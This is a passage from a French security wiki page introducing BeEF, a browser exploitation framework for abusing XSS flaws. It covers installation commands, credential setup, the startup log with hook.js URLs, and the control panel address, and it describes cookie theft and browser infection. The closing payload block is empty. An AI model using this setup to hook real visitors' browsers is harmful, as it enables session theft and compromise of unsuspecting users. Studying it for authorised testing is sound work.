Dans le cas où le caractère **"+"** ne serait pas pris en charge vous pouvez utiliser la fonction **concat**.
## Beef-XSS #### Présentation Cet outil permet à un attaquant d'exploiter des XSS afin d'en tirer profit. Voici les fonctionnalités proposées par **Beef** grâce à ses modules : - **Vol de cookie.** - **Empoisonnement du navigateur** pour capturer/modifier le trafic. - **Détection et infection avec RCE** des navigateurs vulnérables. Voici comment se présente l'interface web de contrôle de Beef pour l'attaquant : [](https://wiki.neopipe.fr/uploads/images/gallery/2023-10/DwGimage.png) #### Installation Une **page github** du projet est dédiée à l'installation de Beef : [https://github.com/beefproject/beef/wiki/Installation](https://github.com/beefproject/beef/wiki/Installation) Vous pouvez aussi exécuter cette commande : ```bash sudo gem install bundler && sudo git clone https://github.com/beefproject/beef && cd beef && sudo apt install libssl-dev && rvm install "ruby-3.0.3" && sudo ./install && sudo bundle install ``` #### Manuel Avant de lancer Beef, il faut éditer le fichier **config.yaml** afin de définir l'utilisateur et le mot de passe dans la section **credentials** : ```json credentials: user: "beef" passwd: "beef1234" ``` Puis démarrez Beef grâce à cette commande : ```bash sudo ./beef ``` Quelque chose comme ça devrait s'afficher : ```bash [12:02:58][*] BeEF is loading. Wait a few seconds... [12:03:01][*] 8 extensions enabled: [12:03:01] | XSSRays [12:03:01] | Social Engineering [12:03:01] | Requester [12:03:01] | Proxy [12:03:01] | Network [12:03:01] | Events [12:03:01] | Demos [12:03:01] |_ Admin UI [12:03:01][*] 303 modules enabled. [12:03:01][*] 5 network interfaces were detected. [12:03:01][*] running on network interface: 127.0.0.1 [12:03:01] | Hook URL: http://127.0.0.1:3000/hook.js [12:03:01] |_ UI URL: http://127.0.0.1:3000/ui/panel [12:03:01][*] running on network interface: 192.168.2.30 [12:03:01] | Hook URL: http://192.168.2.30:3000/hook.js [12:03:01] |_ UI URL: http://192.168.2.30:3000/ui/panel [12:03:01][*] running on network interface: 172.17.0.1 [12:03:01] | Hook URL: http://172.17.0.1:3000/hook.js [12:03:01] |_ UI URL: http://172.17.0.1:3000/ui/panel [12:03:01][*] running on network interface: 192.168.188.1 [12:03:01] | Hook URL: http://192.168.188.1:3000/hook.js [12:03:01] |_ UI URL: http://192.168.188.1:3000/ui/panel [12:03:01][*] running on network interface: 192.168.192.1 [12:03:01] | Hook URL: http://192.168.192.1:3000/hook.js [12:03:01] |_ UI URL: http://192.168.192.1:3000/ui/panel [12:03:01][*] RESTful API key: d0739ac4656cd46389134e01cd48896b46b559d7 [12:03:01][!] [GeoIP] Could not find MaxMind GeoIP database: '/usr/share/GeoIP/GeoLite2-City.mmdb' [12:03:01][*] HTTP Proxy: http://127.0.0.1:6789 [12:03:01][*] BeEF server started (press control+c to stop) ``` Votre serveur de contrôle web Beef est disponible sur toutes vos interfaces sur le **port 3000** à l'adresse suivante : ```html http://localhost:3000/ui/authentication ``` On peut envoyer un payload de ce type pour infecter les utilisateurs qui se rendent sur la page : ```javascript ```